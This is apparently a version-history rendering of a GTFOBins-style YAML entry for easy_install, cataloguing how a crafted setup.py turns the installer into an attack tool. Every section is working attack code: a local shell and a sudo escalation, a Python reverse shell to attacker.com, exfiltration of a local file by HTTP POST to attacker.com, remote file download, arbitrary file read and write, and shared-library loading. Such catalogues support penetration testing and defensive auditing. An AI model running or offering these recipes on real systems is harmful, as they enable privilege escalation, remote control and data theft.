2018-09-27 23:53:55 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-09-27 23:53:55 +02:00
|
|
|
- code: |
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
|
|
|
easy_install $TF
|
2018-10-05 19:55:38 +02:00
|
|
|
reverse-shell:
|
2018-09-27 23:53:55 +02:00
|
|
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'import sys,socket,os,pty;s=socket.socket()
|
|
|
|
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
|
|
|
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
|
|
|
pty.spawn("/bin/sh")' > $TF/setup.py
|
|
|
|
easy_install $TF
|
2018-10-05 19:55:38 +02:00
|
|
|
file-upload:
|
2018-09-27 23:53:55 +02:00
|
|
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
|
|
|
code: |
|
|
|
|
export URL=http://attacker.com/
|
|
|
|
export LFILE=file_to_send
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'import sys; from os import environ as e
|
|
|
|
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
|
|
|
|
else: import urllib as u, urllib2 as r
|
|
|
|
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
|
|
|
|
easy_install $TF
|
|
|
|
- description: Serve files in the local folder running an HTTP server.
|
|
|
|
code: |
|
|
|
|
export LPORT=8888
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'import sys; from os import environ as e
|
|
|
|
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
|
|
|
else: import SimpleHTTPServer as s, SocketServer as ss
|
|
|
|
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
|
|
|
easy_install $TF
|
2018-10-05 19:55:38 +02:00
|
|
|
file-download:
|
2018-09-29 11:47:19 +02:00
|
|
|
- description: Fetch a remote file via HTTP GET request. The file path must be absolute.
|
2018-09-29 11:46:03 +02:00
|
|
|
code: |
|
|
|
|
export URL=http://attacker.com/file_to_get
|
|
|
|
export LFILE=/tmp/file_to_save
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo "import os;
|
|
|
|
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
|
|
|
|
if sys.version_info.major == 3: import urllib.request as r
|
|
|
|
else: import urllib as r
|
|
|
|
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
|
|
|
|
pip install $TF
|
2018-09-28 18:57:23 +02:00
|
|
|
file-write:
|
2018-09-29 11:47:19 +02:00
|
|
|
- description: The file path must be absolute.
|
2018-09-28 18:57:23 +02:00
|
|
|
code: |
|
2018-09-29 11:51:00 +02:00
|
|
|
export LFILE=/tmp/file_to_save
|
2018-09-28 18:57:23 +02:00
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo "import os;
|
2018-09-29 11:51:00 +02:00
|
|
|
os.execl('$(whereis python)', 'python', '-c', 'open(\"$LFILE\",\"w+\").write(\"DATA\")')" > $TF/setup.py
|
2018-09-28 18:57:23 +02:00
|
|
|
easy_install $TF
|
2018-09-27 23:53:55 +02:00
|
|
|
file-read:
|
|
|
|
- description: The read file content is wrapped within program messages.
|
|
|
|
code: |
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'print(open("file_to_read").read())' > $TF/setup.py
|
|
|
|
easy_install $TF
|
2018-10-05 19:55:38 +02:00
|
|
|
library-load:
|
2018-09-27 23:53:55 +02:00
|
|
|
- code: |
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
|
|
|
easy_install $TF
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-09-27 23:53:55 +02:00
|
|
|
- code: |
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
|
|
|
sudo easy_install $TF
|
|
|
|
---
|